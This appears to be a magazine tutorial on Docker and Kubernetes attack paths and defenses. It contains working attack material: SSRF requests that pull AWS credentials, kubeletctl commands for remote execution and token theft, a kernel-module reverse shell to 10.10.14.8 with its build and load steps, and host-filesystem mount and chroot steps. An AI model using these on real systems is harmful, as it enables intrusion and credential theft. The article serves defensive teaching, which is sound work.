Securing the container environment
Escape Room
An escape room is an immersive team-building game in which friends or colleagues work together to solve puzzles and clues to escape a room before time runs out. Within the domain of Kubernetes [1] and Docker [2], one of the primary goals of malicious actors is to compromise a pod or Docker instance. Once they find a way to escape to the host, they can gain root access, resulting in critical consequences – i.e., game over.
Securing a container means addressing multiple layers of the container's environment, such as access and control, internal permissions, network segmentation, vulnerability management, misconfigurations, and excessive privileges, among other things. You also need to differentiate whether containers are deployed within a cloud provider's infrastructure or as on-premises clusters, because each requires a different approach in areas such as identity and access management (IAM) roles, managed infrastructure, and so forth.
Comprehensive coverage of all these aspects would not fit in a single article, so my focus is directed toward various techniques that threat actors or penetration testers may employ to evade container defenses, especially escaping to the host to gain full access to the cluster. Understanding the tactics used is particularly beneficial for blue team members tasked with defense and implementing security controls.
Main Entry Points
To compromise a container, a door has to be open somewhere, and finding that door can pose a challenge, particularly if the container is fortified with robust security measures. Some of the most common tactics that bad actors use to break into containers include:
1. Application vulnerability. Containers are frequently built from images, which can (and most often do) contain vulnerabilities. Attackers might exploit these vulnerabilities to gain access to the container or execute malicious code. One of the most common vulnerabilities for containers is server-side request forgery (SSRF):
2. Server-side request forgery: This form of attack might cause the server to make a connection to internal-only services, potentially leading to unauthorized access. If any application has flaws, these can be exploited to access internal resources. SSRF vulnerabilities can arise from improper input validation or inadequate access controls on the server. Exploitation of SSRF occurs when threat actors supply malicious input (e.g., URLs or IP addresses) in places where the server makes requests to external resources.
An example will make it easier to understand: Consider a typical scenario on a website where users input URLs. If the application lacks an adequate validation mechanism, attackers can manipulate the input to request arbitrary data from local destinations, leading to potential security issues. Although this example is typical, numerous other attack vectors exist. Some attacks can have a bigger effect – particularly those occurring in cloud environments – by exploiting vulnerabilities that grant access to sensitive metadata services.
Just think for a moment of the potential effect if a web application were to permit the URL http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-role-attached in an input field. That action could fetch the AWS access keys and associated secrets for the AWS account, and depending on the permissions granted to the specific role, the result could be devastating.
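To make this more concrete, the following sketch assumes a hypothetical vulnerable endpoint (vulnerable-app.example.com/fetch?url=) that blindly fetches whatever URL it is handed; the two requests mirror how the AWS instance metadata service (IMDSv1) first reveals the attached role name and then its temporary credentials:

# First request lists the IAM role(s) attached to the instance
curl "https://vulnerable-app.example.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
# Second request, with the role name appended, returns the temporary access keys
curl "https://vulnerable-app.example.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-role-attached"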
3. Misconfigurations: Improperly configured Kubernetes or Docker settings can expose sensitive information or provide unauthorized access. Bad actors might look for exposed ports, weak passwords, or misconfigured access controls.
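As a quick illustration of the exposed-ports case, the sketch below probes a host for a Docker daemon whose remote API has been bound to its conventional unencrypted TCP port without authentication; the host address is a placeholder:

# An unauthenticated Docker Engine API on TCP port 2375 will answer both requests
curl -s http://<host-ip>:2375/version
curl -s http://<host-ip>:2375/containers/json

If version details and a container list come back, the daemon can be driven remotely much like a local docker command.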
4. RBAC bad practices: Role-based access control (RBAC) is a crucial aspect of container security, but certain bad practices can undermine its effectiveness. Some examples of bad practices in RBAC for container security include:
- Excessive privileges: Assigning overly broad permissions to users or service accounts within containers can increase the attack surface. Not following the principle of least privilege (PoLP) increases the risk of privilege escalation attacks and unauthorized access to sensitive resources. One good example of a common misconfiguration occurs when RoleBindings and ClusterRoleBindings are assigned to the system:anonymous account, inadvertently providing privileges to anonymous users (see the check sketched after this list).
- Shared credentials: Sharing credentials among multiple containers, users, or tenants makes it a challenge to trace actions back to specific individuals or processes. It also increases the risk of unauthorized access if credentials are compromised.
- Lack of proper logging and monitoring: Without a good detection method in place for unauthorized access or suspicious activities, it becomes difficult to identify security breaches promptly and respond effectively. By avoiding these bad practices, you can minimize the risk of unauthorized access and data breaches.
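As a minimal check for the system:anonymous misconfiguration mentioned above, you can ask the API server what anonymous requests are currently allowed to do and search the existing bindings for anonymous or unauthenticated subjects (this sketch assumes you have admin and impersonation rights on the cluster):

# List the permissions the cluster grants to anonymous requests
kubectl auth can-i --list --as=system:anonymous
# Look for bindings that reference anonymous or unauthenticated subjects
kubectl get clusterrolebindings -o wide | grep -E "system:anonymous|system:unauthenticated"
kubectl get rolebindings -A -o wide | grep -E "system:anonymous|system:unauthenticated"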
5. Insecure APIs. Both Docker and Kubernetes provide APIs for managing containers and clusters. However, improperly configured APIs can serve as entry points for threat actors to gain unauthorized access. Once inside the cluster, malicious actors could perform various actions such as deploying new containers, implanting back doors, and accessing sensitive information.
The kubelet plays a critical role in Kubernetes; it is responsible for managing the state of individual nodes in a Kubernetes cluster. Running on each node, it communicates with the Kubernetes API server to ensure container health and functionality. By default, the kubelet operates on TCP port 10250.
The Kubernetes website provides very little documentation about the kubelet API, and most of its endpoints remain undocumented. However, CyberArk [3] created an open source tool named kubeletctl [4] that implements the kubelet API calls, making it simpler to run commands than with curl.
When the kubelet's anonymous-auth argument is enabled, requests not rejected by other authentication methods are treated as anonymous requests. These requests are then served by the kubelet server, leaving it vulnerable to attack. Nowadays, anonymous authentication is disabled by default, but many outdated clusters could still be in the wild.
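Before reaching for a dedicated tool, you can test for this condition with nothing more than curl; a minimal sketch, assuming anonymous access is enabled on the node (the IP address is a placeholder):

# With anonymous auth enabled, the kubelet read API returns the node's full pod list
curl -sk https://<node-ip>:10250/pods

If this call returns JSON instead of an authorization error, the node deserves a closer look with kubeletctl.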
I will demonstrate the process of running this tool to scan a misconfigured cluster and execute commands on vulnerable pods. To begin, you need to install kubeletctl and then run commands to scan for vulnerabilities and to enumerate all pods on that node (Figure 1). For the parameters, you can specify a single server IP address or a full CIDR (IP range):
kubeletctl pods --server 3.71.72.105 -i
kubeletctl pods --cidr 3.71.72.0/24 -i
To scan all pods vulnerable to remote code execution (RCE), run one of the commands:
kubeletctl scan rce --server 3.71.72.105 -i
kubeletctl scan rce --cidr 3.71.72.0/24 -i
The next example runs a command on a vulnerable pod and then enumerates all the secrets from the cluster (Figure 2):
kubeletctl exec "whoami" -c container_name -p pod_name -n namespace --server 3.71.72.105 -i
kubeletctl scan token --server 3.71.72.105 -i
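Any service account token harvested this way can then be replayed directly against the API server. The following sketch uses placeholder values, because the API server address, port, and token depend on the target cluster:

# Reuse a harvested service account token against the API server
kubectl --server=https://<api-server>:6443 --token=<stolen-token> --insecure-skip-tls-verify get secrets -A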
6. Container breakouts: Attackers might exploit vulnerabilities in the container runtime of a Docker container or a Kubernetes pod to gain access to the host system if the container or pod is not properly isolated. In the next section, I describe some use cases and show you how this works in real life.
Escaping to the Host
By default, Docker containers are unprivileged and cannot, for example, run a Docker daemon inside a Docker container, because a container is not allowed to access any devices; however, a container run in privileged mode is given access to all devices. In addition to the --privileged flag, you can customize which capabilities you want your container to run with --cap-add and --cap-drop.
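For example, rather than reaching for --privileged, you can start a container with every capability dropped and add back only what the workload really needs (NET_BIND_SERVICE here is just an illustrative choice):

docker run --rm -it --cap-drop ALL --cap-add NET_BIND_SERVICE alpine sh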
Docker has a default list of capabilities (Table 1), but Kubernetes follows a different approach, which allows you to add or drop capabilities in the securityContext field of a container:
securityContext:
  capabilities:
    add:
    - SYS_NICE
    drop:
    - SYS_MODULE
Table 1
Docker Capabilities Mapped to Linux
Docker Capabilities | Linux Capabilities |
---|---|
SETPCAP | CAP_SETPCAP |
SYS_MODULE | CAP_SYS_MODULE |
SYS_RAWIO | CAP_SYS_RAWIO |
SYS_PACCT | CAP_SYS_PACCT |
SYS_ADMIN | CAP_SYS_ADMIN |
SYS_NICE | CAP_SYS_NICE |
SYS_RESOURCE | CAP_SYS_RESOURCE |
SYS_TIME | CAP_SYS_TIME |
SYS_TTY_CONFIG | CAP_SYS_TTY_CONFIG |
MKNOD | CAP_MKNOD |
AUDIT_WRITE | CAP_AUDIT_WRITE |
AUDIT_CONTROL | CAP_AUDIT_CONTROL |
MAC_OVERRIDE | CAP_MAC_OVERRIDE |
MAC_ADMIN | CAP_MAC_ADMIN |
NET_ADMIN | CAP_NET_ADMIN |
SYSLOG | CAP_SYSLOG |
CHOWN | CAP_CHOWN |
NET_RAW | CAP_NET_RAW |
DAC_OVERRIDE | CAP_DAC_OVERRIDE |
FOWNER | CAP_FOWNER |
DAC_READ_SEARCH | CAP_DAC_READ_SEARCH |
FSETID | CAP_FSETID |
KILL | CAP_KILL |
SETGID | CAP_SETGID |
SETUID | CAP_SETUID |
LINUX_IMMUTABLE | CAP_LINUX_IMMUTABLE |
NET_BIND_SERVICE | CAP_NET_BIND_SERVICE |
NET_BROADCAST | CAP_NET_BROADCAST |
IPC_LOCK | CAP_IPC_LOCK |
IPC_OWNER | CAP_IPC_OWNER |
SYS_CHROOT | CAP_SYS_CHROOT |
SYS_PTRACE | CAP_SYS_PTRACE |
SYS_BOOT | CAP_SYS_BOOT |
LEASE | CAP_LEASE |
SETFCAP | CAP_SETFCAP |
WAKE_ALARM | CAP_WAKE_ALARM |
BLOCK_SUSPEND | CAP_BLOCK_SUSPEND |
With capabilities, you can grant certain privileges to a process without granting all the privileges of the root user. Some capabilities can be dangerous and risky, and bad actors will leverage those privileges to compromise the host.
The CAP_SYS_MODULE capability allows the insertion and removal of kernel modules from within a container directly into the host machine's kernel. Consider the security implications this capability presents: privilege escalation and complete system compromise by allowing modifications to the kernel and, most importantly, by bypassing all Linux security layers and container isolation mechanisms.
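A quick way to see which capabilities a container actually holds is to read the effective capability mask of its init process and decode it; capsh is part of the libcap utilities and might need to be installed in the image first:

# Show the effective capability bitmask of PID 1 inside the container
grep CapEff /proc/1/status
# Decode the bitmask into readable capability names (use the value from the previous output)
capsh --decode=<CapEff-value>

If CAP_SYS_MODULE shows up in the decoded list, the escape described next is on the table.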
To demonstrate this behavior, the following steps grant complete access to the host by inserting a pre-built kernel module. On the host node, I develop a kernel module that initiates a reverse shell to a specified destination by creating the revershell.c kernel source file (Listing 1) and the makefile (Listing 2) used to compile it. Note that in the makefile, the spaces you see before the make commands are tabs.
Listing 1
Reverse Shell
#include <linux/kmod.h>
#include <linux/module.h>

MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");

char* argv[] = {"/bin/bash", "-c", "bash -i >& /dev/tcp/10.10.14.8/4444 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL};

// call_usermodehelper function is used to create user mode processes from kernel space
static int __init reverse_shell_init(void)
{
    return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

static void __exit reverse_shell_exit(void)
{
    printk(KERN_INFO "Exiting\n");
}

module_init(reverse_shell_init);
module_exit(reverse_shell_exit);
Listing 2
Makefile
obj-m += revershell.o

all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
Now executing make creates the revershell.ko file, which is the kernel module. Once it is compiled, you must launch a privileged Docker container equipped with the SYS_MODULE capability after ensuring that the Docker daemon is installed on your machine:
docker run --rm --privileged -it alpine sh
Next, determine a method to transfer your newly created kernel module into the running container. One straightforward approach is to run a web server (with Python's built-in http.server module) in the same directory as the file and then, from the container, use wget to retrieve the file:
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/)
On the running container, you get a shell and then run the wget command shown in Listing 3 (with its output) to download the revershell.ko file. Now make the module executable and insert it into the host kernel:
chmod +x revershell.ko
insmod revershell.ko
Listing 3
Download revershell File
wget http://172.18.0.1:8000/revershell.ko
Connecting to 172.18.0.1:8000 (172.18.0.1:8000)
saving to 'revershell.ko'
revershell.ko 100% |****************************************************************| 111k 0:00:00 ETA
'revershell.ko' saved
On the host, you can verify that the kernel module has been loaded successfully by running lsmod and searching for the name of the module. In Figure 3 you can see the active module you inserted before.
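Keep in mind that the module in Listing 1 connects back to 10.10.14.8 on port 4444, so a listener has to be waiting on that attacker-controlled host before you insert the module; with a netcat build that supports these flags, that is simply:

nc -lvnp 4444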
Some methods let you limit what a capability can do by implementing security controls that ship out of the box with the operating system. The following are the most important and popular methods:
- AppArmor [5] is a security enhancement to confine containers to a limited set of resources. You can configure it for any application to reduce its potential attack surface. On Kubernetes, it restricts what containers are allowed to do.
- Secure computing (seccomp) [6] can limit the syscalls a container is allowed to make. A default seccomp profile is enabled when running Docker containers (only if Docker has been built with seccomp and the kernel is configured with CONFIG_SECCOMP enabled), but if you run a privileged container, it will be disabled. Also note that when running on a Kubernetes cluster, seccomp is disabled by default.
- The open source SELinux [7] project allows admins to have more control over who can access the system. As with seccomp, running the container with the --privileged flag also removes or disables this security feature.
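Because seccomp is disabled by default on a Kubernetes cluster, a pod has to opt in explicitly. A minimal sketch that requests the container runtime's default profile could look like this (the pod name, container name, and image are placeholders):

apiVersion: v1
kind: Pod
metadata:
  name: seccomp-default
spec:
  securityContext:
    seccompProfile:
      type: RuntimeDefault
  containers:
  - name: app
    image: nginx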
Abusing Exposed Host Directories
When running a pod or a Docker container in privileged mode, it is possible to mount the host's root filesystem into the container. In this example, I use a Kubernetes pod in privileged mode (privileged: true):
apiVersion: v1
kind: Pod
metadata:
  name: nginx
spec:
  containers:
  - name: nginx
    image: nginx
    securityContext:
      privileged: true
You need to save the file as privileged_pod.yaml, then deploy it on your cluster and get a shell into your newly created container with:
kubectl apply -f privileged_pod.yaml
kubectl exec -it nginx -- /bin/bash
From the prompt of your container, create a directory and mount the root filesystem (run lsblk to verify the host filesystem; in this case, nvme0n1p1):
mkdir /mnt/host_root
mount /dev/nvme0n1p1 /mnt/host_root
Now if you change directory to /mnt/host_root, you can see all the files from the host system (e.g., /etc/passwd and other interesting and sensitive files).
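From there, an attacker would typically change root into the mounted tree so that every command operates directly on the node's filesystem (assuming a shell such as bash exists on the host image):

# Treat the mounted host filesystem as the new root
chroot /mnt/host_root /bin/bash

At that point, reading /etc/shadow or planting a key in /root/.ssh/authorized_keys is just ordinary file access, which is exactly why privileged pods should remain a rare exception.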